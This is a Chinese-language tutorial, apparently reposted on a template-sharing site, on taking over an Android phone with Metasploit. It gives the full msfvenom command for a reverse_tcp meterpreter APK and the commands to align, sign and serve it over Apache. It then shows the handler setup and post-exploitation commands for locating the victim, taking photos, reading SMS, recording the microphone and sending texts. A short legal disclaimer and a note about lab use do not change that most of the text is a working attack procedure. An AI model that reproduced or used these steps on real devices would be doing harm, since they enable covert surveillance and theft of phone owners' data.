MSF手机渗透实验

这篇具有很好参考价值的文章主要介绍了MSF手机渗透实验。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一、准备阶段

  本实验是在kail里面使用msf工具生成一个Android木马程序,然后客户端进行下载,从而渗透。

实验范围为局域网的手机,即入侵的手机要与电脑处于同一个网段,这就需要将虚拟机设置为桥接模式,并手动配置ip。

1.查看虚拟机ip

MSF手机渗透实验

此时手机的ip段为192.168.43.0段故需要更改虚拟机ip

vim /etc/network/interfaces

更改静态ip、网关等 MSF手机渗透实验

重启虚拟机网络配置

systemctl restart networking

查看ip地址 MSF手机渗透实验

 连通性测试

MSF手机渗透实验

 二、生成Android木马程序

1.获取apk

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.43.38 lport=5555 R>zzh.apk

其中lhost后面是虚拟机端的ip地址,lport也是虚拟机的端口号(256以上可以随便设置,尽量大点)。后面跟的zzh.apk为生成的Android程序名称。

MSF手机渗透实验

2.对应用进行对齐优化

a.先下载zipalign工具

MSF手机渗透实验

b.使用工具输入命令进行对齐优化

zipalign -v 4 zzh.apk GRIT.apk

zipalign -v 4 原Apk 优化完Apk地址

输出结果为如下图:

 MSF手机渗透实验

此时该路径下应该有两个apk文件一个是最初始的zzh.apk,一个是对齐后的GRIT.apk

MSF手机渗透实验

 3.生成密钥对

keytool -genkey -v -keystore zzh.keystore -alias zzh -keyalg RSA -keysize 2084 -validity 365

 a.解析

-alias 产生别名(zzh)
-keystore 指定密钥库的名称(就像数据库一样的证书库,可以有很多个证书,cacerts这个文件是jre自带的,你也可以使用其它文件名字,如果没有这个文件名字,它会创建这样一个这里为zzh.keystore)
-v 显示密钥库中的证书详细信息
-validity 指定创建的证书有效期多少天(365)
-keysize 指定密钥长度(2084)

-keyalg RSA(算法)

b. 输出结果

MSF手机渗透实验

4.对apk签名

a.下载apksigner工具

MSF手机渗透实验

b.使用工具签名

apksigner sign --ks zzh.keystore --ks-key-alias zzh GRIT.apk 

c.解析

apksigner sign --ks (签名地址zzh.keystore) --ks-key-alias (别名zzh) (待签名的apk地址)

d.结果

MSF手机渗透实验

此处需要输入密码为生成密钥对时设置的密码 。

三、下载GRIT.apk

将上面的设置完成后就可以将GRIT.apk下载到手机上进行实验了

1.直接通过发送方法发送到手机上

2.手机访问ip下载

a.在此处插入一行

MSF手机渗透实验

 b.开启相关服务

service apache2 start

c.手机访问ip下载

MSF手机渗透实验MSF手机渗透实验MSF手机渗透实验MSF手机渗透实验

 最后的结果弹出版本旧,哈哈,到这步手机部分已经结束了....

 四、启动msfconsole

1.加载模块

use exploit/multi/handler

2.设置payload监听

set payload android/meterpreter/reverse_tcp

3.设置options

set lhost 192.168.43.38
set lport 5555

MSF手机渗透实验

五、启动

1.run

MSF手机渗透实验

2.点击手机软件

MSF手机渗透实验

六、检验

1.定位

MSF手机渗透实验

2.拍照

MSF手机渗透实验

MSF手机渗透实验

3.手机电话号码

MSF手机渗透实验

4.短信

MSF手机渗透实验

5.录音

record_mic录音加上-d参数指定录音时长(秒)

6.发送信息

send_sms -d 号码 -t "信息"

 六、结语

  根据国家安全法,非法入侵一定是犯法的,此次实验主要是告诉我们以后看到无视风险安装和退出安装,记得一定把控住点退出安装啊。文章来源地址https://www.toymoban.com/news/detail-502815.html

到了这里,关于MSF手机渗透实验的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 内网渗透 Metasploit(MSF)基础使用

    ​ Metasploit 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在 Metasploit 和综合报

    2024年01月16日
    浏览(46)
  • 详尽的msf——meterpreter——渗透测试教程

    本文仅供学习参考使用,切勿用于非法事情!! 众所周知,msf是大家公认的神器,年少不知msf香,总想自己写程序。 现在发现msf很厉害,可以在它的基础上开发。 msf是框架,什么意思呢,用它可以做渗透攻击的一整套流程,包括前期探索(发育),中期攻击(开团),后期

    2023年04月15日
    浏览(44)
  • 内网渗透测试 MSF搭建socks代理

    最终效果为如此,web服务器可以ping通外网和内网两台服务器     信息收集 发现端口: 80 http 3306 mysql 敏感目录: /phpMyadmin 现在咱们查询一下日志功能是否开启,默认是关闭的。 show variables like \\\"general_log%\\\"; 命令行 set globalgeneral_log=\\\'on\\\'; 图形化: 输入一句话木马并执行,使日志

    2023年04月08日
    浏览(40)
  • 论后渗透MSF之 | 添加路由和代理

    内网中添加路由主要是 充当跳板 功能, 其实是MSF框架中自带的一个路由转发功能,其实现过程就是MSF框架在已经获取的meterpreter shell的基础上 添加一条去往内网的路由 ,此路由的下一跳转发,即网关,是MSF攻击平台与被攻击目标建立的一个session会话 通过msf添加路由功能,

    2024年01月16日
    浏览(43)
  • msf渗透练习-生成木马控制window系统

    说明: 本章内容,仅供学习,不要用于非法用途(做个好白帽) (一)生成木马 命令: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.23.46 LPORT=4444 -e x86/shikata_ga_nai -f exe -o shell.exe -i 5 -p:设置payload,也就是要生成的可执行文件的类型和功能,这里选择的是Windows Meterpreter反向

    2024年02月08日
    浏览(40)
  • 我的MSF之Android木马渗透的学习笔记

    免责声明:以下内容仅供学习参考,如果用于任何非法途径,后果自负,希望大家做一个遵纪守法的好公民,一起保护国家的的网络安全!!! 攻击机:kali 靶机:Android 1.木马制作 通过 msfvenom 制作安卓木马 2.开启http服务 在 kali 终端输入以下命令开启http服务 3.靶机下载木马

    2024年02月12日
    浏览(36)
  • 利用msf进行内网的木马渗透详细教程

    本文仅限学术交流,请勿用他人实践 本文通过kali系统进行内网渗透。主机 ip:172.20.10.14 靶机ip:172.20.10.3(win10)  文章目录 前言 一 准备工作 二 进行渗透 1.开启服务:需要开启apache和postgresql服务 2.制作木马文件,利用msf进行渗透 总结  提示:以下是本篇文章正文内容,下

    2023年04月08日
    浏览(44)
  • Kali Linux利用MSF渗透Windows11电脑

    目录 一、MSF简介 渗透环境 二、渗透流程 1.Kali Linux进入Root模式  2.生成可执行文件 3.运行msfconsole命令  4.配置参数  5.在靶机Windows11打开可执行文件 6.渗透 Msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenom是Msfpayloa

    2024年02月06日
    浏览(44)
  • 内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

    前言 作者简介:不知名白帽,网络安全学习者。 博客主页:https://blog.csdn.net/m0_63127854?type=blog 内网渗透专栏:https://blog.csdn.net/m0_63127854/category_11885934.html 网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan CFS三层靶场搭建: 内网渗透之CFS三层靶机搭建_不知名白帽的博客-CSD

    2024年02月02日
    浏览(40)
  • 内网渗透—代理Socks协议、路由不出网、后渗透通讯、CS-MSF控制上线

      本章主要涉及到的技术就是如何让攻击机通过能够上网的主机当作跳板去连接内网中不能上网的主机,有点绕口。不过通过介绍页能够大概明白是什么意思。   在我们做渗透的时候,通常企业都会设定有些软硬件防火墙,当企业有业务需求的时候会通过防火墙放通地址

    2024年02月05日
    浏览(51)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包